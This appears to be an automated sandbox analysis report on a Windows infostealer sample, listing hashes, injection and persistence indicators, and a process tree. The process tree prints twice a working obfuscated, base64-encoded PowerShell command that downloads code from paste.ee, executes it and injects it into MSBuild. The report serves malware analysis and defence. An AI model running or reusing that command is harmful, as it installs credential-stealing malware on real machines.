Analysis
-
max time kernel
150s -
max time network
146s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
08-07-2020 10:12
Static task
static1
Behavioral task
behavioral1
Sample
DvnH2.exe
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
DvnH2.exe
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
DvnH2.exe
-
Size
847KB
-
MD5
bc23e4cf90c63d9a84eb905e6ec82f82
-
SHA1
b82df977fcc19b730ac2cdacec7d3b93617c57ed
-
SHA256
0396da4728728701d82bea35844941b36b6ff001bd4a46b3e3f45d5143205b16
-
SHA512
01007caceb1e777b55d3118f7cb21117f2ca17b4caf211108b90de705c490c472df859da2802d015329b856d1be303bff6f73a624cb720682cea3f1cd0dcddd4
Malware Config
Signatures
-
Suspicious use of FindShellTrayWindow 5 IoCs
Processes:
Explorer.EXEpid process 1184 Explorer.EXE 1184 Explorer.EXE 1184 Explorer.EXE 1184 Explorer.EXE 1184 Explorer.EXE -
Processes:
cmmon32.exedescription ioc process Key created \Registry\User\S-1-5-21-910373003-3952921535-3480519689-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 cmmon32.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
DvnH2.exepowershell.exepowershell.exeExplorer.EXEcmmon32.exedescription pid process target process PID 676 wrote to memory of 872 676 DvnH2.exe powershell.exe PID 676 wrote to memory of 872 676 DvnH2.exe powershell.exe PID 676 wrote to memory of 872 676 DvnH2.exe powershell.exe PID 676 wrote to memory of 872 676 DvnH2.exe powershell.exe PID 872 wrote to memory of 1036 872 powershell.exe powershell.exe PID 872 wrote to memory of 1036 872 powershell.exe powershell.exe PID 872 wrote to memory of 1036 872 powershell.exe powershell.exe PID 872 wrote to memory of 1036 872 powershell.exe powershell.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1036 wrote to memory of 1816 1036 powershell.exe MSBuild.exe PID 1184 wrote to memory of 1836 1184 Explorer.EXE cmmon32.exe PID 1184 wrote to memory of 1836 1184 Explorer.EXE cmmon32.exe PID 1184 wrote to memory of 1836 1184 Explorer.EXE cmmon32.exe PID 1184 wrote to memory of 1836 1184 Explorer.EXE cmmon32.exe PID 1836 wrote to memory of 1848 1836 cmmon32.exe cmd.exe PID 1836 wrote to memory of 1848 1836 cmmon32.exe cmd.exe PID 1836 wrote to memory of 1848 1836 cmmon32.exe cmd.exe PID 1836 wrote to memory of 1848 1836 cmmon32.exe cmd.exe PID 1836 wrote to memory of 1936 1836 cmmon32.exe Firefox.exe PID 1836 wrote to memory of 1936 1836 cmmon32.exe Firefox.exe PID 1836 wrote to memory of 1936 1836 cmmon32.exe Firefox.exe PID 1836 wrote to memory of 1936 1836 cmmon32.exe Firefox.exe PID 1836 wrote to memory of 1936 1836 cmmon32.exe Firefox.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exeMSBuild.execmmon32.exedescription pid process Token: SeDebugPrivilege 872 powershell.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 1816 MSBuild.exe Token: SeDebugPrivilege 1836 cmmon32.exe -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1036 powershell.exe 5 1036 powershell.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
Processes:
powershell.exepowershell.exeMSBuild.execmmon32.exepid process 872 powershell.exe 872 powershell.exe 1036 powershell.exe 1036 powershell.exe 1816 MSBuild.exe 1816 MSBuild.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe -
Adds Run entry to policy start application 2 TTPs 2 IoCs
Processes:
cmmon32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run cmmon32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\J0HTUFWHU68 = "C:\\Program Files (x86)\\Badll_reh\\configafilu.exe" cmmon32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 1 IoCs
Processes:
cmmon32.exedescription ioc process File opened for modification C:\Program Files (x86)\Badll_reh\configafilu.exe cmmon32.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
cmmon32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer cmmon32.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Processes:
Explorer.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Explorer.EXE -
Suspicious use of SetThreadContext 3 IoCs
Processes:
powershell.exeMSBuild.execmmon32.exedescription pid process target process PID 1036 set thread context of 1816 1036 powershell.exe MSBuild.exe PID 1816 set thread context of 1184 1816 MSBuild.exe Explorer.EXE PID 1836 set thread context of 1184 1836 cmmon32.exe Explorer.EXE -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
MSBuild.execmmon32.exepid process 1816 MSBuild.exe 1816 MSBuild.exe 1816 MSBuild.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe 1836 cmmon32.exe -
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXEpid process 1184 Explorer.EXE 1184 Explorer.EXE 1184 Explorer.EXE 1184 Explorer.EXE
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Suspicious use of SendNotifyMessage
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"C:\Users\Admin\AppData\Local\Temp\DvnH2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAJwAgACsAIABbAEMAaABhAHIAXQA1ADgAIAArACAAJwAvAC8AcABhAHMAdABlAC4AZQBlAC8AcgAvAHcAagBtAFgAcQAnACkALgBSAGUAcABsAGEAYwBlACgAIgBeACIALAAgACIANAA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA0ADgAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAIwAiACwAIAAiADcAOAAiACkAfABJAEUAWAA7AFsAQgB5AHQAZQBbAF0AXQAkAGYAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8ATwB1AHcASgBaACcAKQAuAHIAZQBwAGwAYQBjAGUAKAAnACQAJAAnACwAJwAwAHgAJwApAHwASQBFAFgAOwBbAEMALgBNAF0AOgA6AFIAKAAnAE0AUwBCAHUAaQBsAGQALgBlAHgAZQAnACwAJABmACkA4⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1816 -
C:\Windows\SysWOW64\cmmon32.exe"C:\Windows\SysWOW64\cmmon32.exe"2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Adds Run entry to policy start application
- Drops file in Program Files directory
- System policy modification
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:1836 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:1848
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:1936